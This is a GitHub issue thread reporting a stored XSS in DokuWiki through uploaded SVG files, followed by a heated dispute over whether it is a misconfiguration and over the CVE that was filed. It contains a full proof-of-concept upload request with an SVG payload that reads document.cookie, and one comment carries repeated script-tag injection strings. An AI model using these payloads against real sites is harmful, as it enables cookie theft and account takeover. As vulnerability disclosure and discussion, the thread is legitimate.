### ISSUE TITLE
DokuWiki 2024-02-06a has a stored XSS vulnerability

### ISSUE THREAD

**Issue by Hebing123** [dokuwiki/dokuwiki#4267]
# Summary
DokuWiki 2024-02-06a has a storage XSS vulnerability, an attacker can upload a malicious svg file to obtain other users' cookies.
# Details
We found that in the `Media Manager`, it is allowed to include svg in the file extension list. svg files can execute html code.
![image](https://github.com/dokuwiki/dokuwiki/assets/66168888/8253997e-60a0-43eb-9741-436fbaca0aec)
We posted a SVG file contains malicious code, and then click to view: `http://192.168.160.154:1042/lib/exe/fetch.php?media=alert.svg`
![image](https://github.com/dokuwiki/dokuwiki/assets/66168888/3b0c22fa-54f6-46fe-852c-9753d1a32e33)
It doesn't seem to trigger the popup code. But we access URL at `http://192.168.160.154:1042/data/media/alert.svg`.We found that it successfully executed the code.We should not put the save address of the svg file in a place where the user can access. The fetch.php file used for html code filtering here looks funny.
![image](https://github.com/dokuwiki/dokuwiki/assets/66168888/69f0e097-8476-4c48-84bd-a799f9b8e6eb)
Of course, it is important to note that not every svg file can be successfully uploaded, because I have noticed that when the svg file is uploaded, the server detects malicious code and prompts that the upload operation is blocked because of possible malicious content.
# Proof of Concept (POC)
```
POST /lib/exe/ajax.php?tab_files=files&tab_details=view&do=media&ns=&sectok=&mediaid=&call=mediaupload&qqfile=alert.svg&ow=false HTTP/1.1
Host: your-ip
Content-Length: 195
X-Requested-With: XMLHttpRequest
X-File-Name: alert.svg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Content-Type: application/octet-stream
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <circle r="50" cx="50" cy="50" fill="red" 
            onmouseover="alert(document.cookie);" />
</svg>
```
Then visit http://your-ip/data/media/alert.svg can trigger.

### Version of DokuWiki

DokuWiki 2024-02-06a "Kaos"

### PHP Version

8.2

**Comment by splitbrain** [comment]
Your data directory should never be directly accessible. This is a misconfiguration of your webserver and the admin interface should warn you about it. All access to media files has to go through the fetch.php dispatcher which will add a CSP header to prevent attacks like these (and will also check ACLs).

**Comment by carnil** [comment]
(note just relaying the information): apparently a CVE was assigned referring to this issue in https://www.cve.org/CVERecord?id=CVE-2024-33103 .

@splitbrain with your upstream hat on, could you ask the assigning CNA to reject the CVE? (in MITREs case this can be done via https://cveform.mitre.org)

**Comment by splitbrain** [comment]
@Hebing123 if your data directory is not secured, a xss vulnerability is the least of your concerns. But thank you very much for creating unnecessary work for open source maintainers. Especially after having received feedback on your initial report.

**Comment by splitbrain** [comment]
oh look. first time I block a user on github.

**Comment by vsuppor** [comment]
@splitbrain I understand your position, the maintenance of open source projects takes a lot of time and effort, and I salute your contributions.  However, I want to stress that we all want this project to be safe for everyone to use.
If you blame the user for every correct security practice, you are abdicating responsibility and betraying the trust of the user.  He was just trying to help make our community safer.  Thank you for your understanding.

**Comment by michitux** [comment]
@vsuppor and everybody else who finds this: please read https://www.dokuwiki.org/security which is linked as second step on https://www.dokuwiki.org/install. It very clearly states that if you're not using Apache or your Apache doesn't use .htaccess, you need to make sure that a list of directories, among them the data directory, aren't accessible from the web.

I therefore agree with @splitbrain that what @Hebing123 reports is not a security vulnerability but a setup problem. Claiming that an improper setup needs to be fixed in the software itself is not helping anybody but just causing more work for open source maintainers.

There is nothing DokuWiki can do to make the setup safer by default, DokuWiki already includes .htaccess files to secure the installation by default with Apache, other web servers don't support such configuration files, and DokuWiki already displays a warning in the admin area when the installation is not secured.

**Comment by vsuppor** [comment]
你好。已收到你的邮件，我会在假期结束后尽快处理。<script>alert(1)</script><script>alert(1)</script><script>alert(1)</script>————————————这是来自QQ邮箱的自动回复邮件。

**Comment by vsuppor** [comment]
@michitux You are right, it is clear that the vendor anticipated this, but was not prepared to fix it manually, instead throwing the onus on the user who installed the system. Remarkably, there seem to be few exceptions, except for dokuwiki.

**Comment by fiwswe** [comment]
There are a number of issues here:
* @Hebing123 was rude in immediately filing a CVE for a configuration mistake that is clearly documented as something you should not do.
* Preventing client access to a directory within the webserver document root can only be accomplished using options of the webserver and/or the underlying OS. PHP code can not help there. Obscuring the file names is not a solution as they would still be accessible.
* Instead of discussing responsibilities and theoretical improvements, how about providing PRs to implement those ideas? That would be much more constructive than blaming the project authors for your own inability to read instructions.

**Comment by vsuppor** [comment]
@fiwswe 
You're criticizing the individual who reported the vulnerability, without even being certain if the CVE request was made after the maintainer's response? Also, I believe that the maintainer's attitude is questionable at best. Additionally, your comments suggest a lack of understanding regarding secure development strategies, as if you consider yourself an impartial observer.

**Comment by HisBestgift** [comment]
@fiwswe It's clear that the maintainer doesn't need any issues, so who's going to submit a PR about this things?

**Comment by fiwswe** [comment]
@vsuppor 
>You're criticizing the individual who reported the vulnerability, without even being certain if the CVE request was made after the maintainer's response?

Issue opened and responded to: 2 weeks ago, CVE published: 2024-04-30

> Also, I believe that the maintainer's attitude is questionable at best.

I respectfully disagree.

>According to the comments, the project maintainers have blocked the vulnerability submitter and @Hebing123 is unable to speak.

Yes, but that is the project owners decision. I understand why it was done, though I agree it is not ideal.

>Additionally, your comments suggest a lack of understanding regarding secure development strategies, as if you consider yourself an impartial observer.

Please explain. Is my comment about access to the document root incorrect? Or is my redirection to PRs as a more constructive way to deal with this discussion somehow out-of-line for an Open Source project?

BTW: I am not an impartial observer. I use DokuWiki and I occasionally contribute to the project.

@HisBestgift 
> It's clear that the maintainer doesn't need any issues,

That does not match my experience.

> so who's going to submit a PR about this things?

Anyone willing to improve this project instead of just complaining.

**Comment by splitbrain** [comment]
You can stop creating sock puppets. I will continue to block them.
